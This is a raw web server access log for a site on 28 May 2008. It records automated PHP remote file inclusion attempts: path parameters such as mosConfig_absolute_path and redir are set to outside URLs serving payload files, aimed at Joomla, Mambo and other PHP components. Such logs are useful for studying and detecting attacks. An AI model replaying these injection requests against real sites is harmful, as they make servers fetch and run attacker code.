72.9.228.149 - - [28/May/2008:11:15:13 -0700] "GET /index.php?redir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.812" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:11:15:18 -0700] "GET /phplinks/includes/smarty.php?full_path_to_public_program=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:11:15:18 -0700] "GET /logs/phplinks/includes/smarty.php?full_path_to_public_program=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
121.254.129.70 - - [28/May/2008:11:15:18 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://linknetcrew.com/source/robo.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
121.254.129.70 - - [28/May/2008:11:15:18 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://linknetcrew.com/source/robo.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
200.62.55.102 - - [28/May/2008:11:15:32 -0700] "GET /logs/index.php?redir=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:11:15:35 -0700] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:11:15:35 -0700] "GET /logs//spid/lang/lang.php?lang_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:11:15:36 -0700] "GET //spid/lang/lang.php?lang_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
200.62.55.102 - - [28/May/2008:11:15:36 -0700] "GET /index.php?redir=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:11:15:46 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.62.55.102 - - [28/May/2008:11:15:47 -0700] "GET /logs/access_080401.log//ashnews.php?pathtoashnews=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:16:02 -0700] "GET /logs/index.php?redir=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:16:02 -0700] "GET /logs/index.php?redir=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:16:04 -0700] "GET /index.php?redir=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.76" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:16:04 -0700] "GET /index.php?redir=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.76" "www.dmulk.com"
61.63.40.205 - - [28/May/2008:11:16:05 -0700] "GET /logs/index.php?redir=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.63.40.205 - - [28/May/2008:11:16:07 -0700] "GET /index.php?redir=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
84.243.253.159 - - [28/May/2008:11:16:14 -0700] "GET /logs/access_080111.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [28/May/2008:11:16:14 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [28/May/2008:11:16:14 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [28/May/2008:11:16:15 -0700] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.208.69.184 - - [28/May/2008:11:16:19 -0700] "GET //PHP_CON/Exchange/include.php?webappcfg%5BAPPPATH%5D=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.59 - - [28/May/2008:11:16:32 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/target/ndus/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.59 - - [28/May/2008:11:16:32 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/target/ndus/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.59 - - [28/May/2008:11:16:33 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/target/ndus/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.59 - - [28/May/2008:11:16:33 -0700] "GET /logs/access_080303.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/target/ndus/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.69.184 - - [28/May/2008:11:16:40 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:16:57 -0700] "GET /logs/access_080118.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:11:16:58 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/mahesaputra53/kiss.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.188 - - [28/May/2008:11:17:02 -0700] "GET /logs/index.php?redir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [28/May/2008:11:17:03 -0700] "GET /index.php?redir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:17:11 -0700] "GET /logs/access_080118.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:11:17:15 -0700] "GET /logs/access_080102.log//modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:17:16 -0700] "GET /logs/index.php?redir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:17:18 -0700] "GET /index.php?redir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:11:17:19 -0700] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.69.184 - - [28/May/2008:11:17:25 -0700] "GET //content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:11:17:26 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:11:17:29 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:17:39 -0700] "GET /logs/access_080118.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:11:17:44 -0700] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:11:17:47 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.246.128.120 - - [28/May/2008:11:17:56 -0700] "GET /errors.php?error=http://internetforall.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:11:17:57 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.41.233.81 - - [28/May/2008:11:18:05 -0700] "GET /logs/access_080118.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.41.233.81 - - [28/May/2008:11:18:05 -0700] "GET /logs/access_080118.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:11:18:10 -0700] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:11:18:14 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:11:18:20 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.168.36.247 - - [28/May/2008:11:18:34 -0700] "GET //include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:18:35 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:18:36 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.810" "www.dmulk.com"
69.94.56.38 - - [28/May/2008:11:18:37 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gxczhb.gov.cn/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.38 - - [28/May/2008:11:18:37 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gxczhb.gov.cn/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.38 - - [28/May/2008:11:18:37 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gxczhb.gov.cn/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.38 - - [28/May/2008:11:18:37 -0700] "GET /logs/access_080303.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gxczhb.gov.cn/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:11:18:39 -0700] "GET /logs/access_080102.log//modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.63.40.205 - - [28/May/2008:11:18:53 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.63.40.205 - - [28/May/2008:11:18:54 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.63.40.205 - - [28/May/2008:11:18:54 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.62.55.115 - - [28/May/2008:11:19:00 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.bestpaket.ru/netcat//dump/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.55.115 - - [28/May/2008:11:19:01 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.bestpaket.ru/netcat//dump/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:19:08 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.31.117 - - [28/May/2008:11:19:15 -0700] "GET /logs/access_080206.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:11:19:16 -0700] "GET /logs/access_080327.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:11:19:18 -0700] "GET /logs/access_080102.log//modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:11:19:25 -0700] "GET /logs/access_080102.log//modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.41.233.81 - - [28/May/2008:11:19:25 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
78.41.233.81 - - [28/May/2008:11:19:26 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.69.184 - - [28/May/2008:11:19:27 -0700] "GET //templates/xhelp//admin/includes/admin_header.php?level=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.255.60.210 - - [28/May/2008:11:19:36 -0700] "GET /logs/config.php?path_to_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.60.210 - - [28/May/2008:11:19:37 -0700] "GET /config.php?path_to_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.60.210 - - [28/May/2008:11:19:37 -0700] "GET /logs/config.php?path_to_root=http://www.jjran.com/board/include/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.60.210 - - [28/May/2008:11:19:37 -0700] "GET /config.php?path_to_root=http://www.jjran.com/board/include/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.246.128.120 - - [28/May/2008:11:19:45 -0700] "GET /logs/access_071225.log/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://internetforall.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.246.128.120 - - [28/May/2008:11:19:45 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://internetforall.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.246.128.120 - - [28/May/2008:11:19:45 -0700] "GET /logs/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://internetforall.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.148.29.218 - - [28/May/2008:11:20:15 -0700] "GET /logs/access_080327.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.63.40.205 - - [28/May/2008:11:20:35 -0700] "GET /logs/access_080401.log//ashnews.php?pathtoashnews=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:20:37 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:20:38 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:20:41 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:20:42 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:20:42 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:20:53 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.79" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:11:20:58 -0700] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:11:21:05 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:21:06 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:21:06 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.194.149.96 - - [28/May/2008:11:21:10 -0700] "GET /logs/access_080101.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:11:21:15 -0700] "GET /logs/access_080327.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:11:21:23 -0700] "GET /logs//tools/errors.php?error=http://www.jjkosta.org/kbs/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:11:21:23 -0700] "GET //tools/errors.php?error=http://www.jjkosta.org/kbs/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
200.30.73.117 - - [28/May/2008:11:21:35 -0700] "GET /modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
200.30.73.117 - - [28/May/2008:11:21:35 -0700] "GET /logs/modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
64.180.134.223 - - [28/May/2008:11:21:37 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.180.134.223 - - [28/May/2008:11:21:39 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.200.229.181 - - [28/May/2008:11:21:40 -0700] "GET /logs/access_071225.log/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.200.229.181 - - [28/May/2008:11:21:40 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.200.229.181 - - [28/May/2008:11:21:40 -0700] "GET /logs/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
63.246.128.120 - - [28/May/2008:11:21:40 -0700] "GET /logs/access_071225.log/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.246.128.120 - - [28/May/2008:11:21:40 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
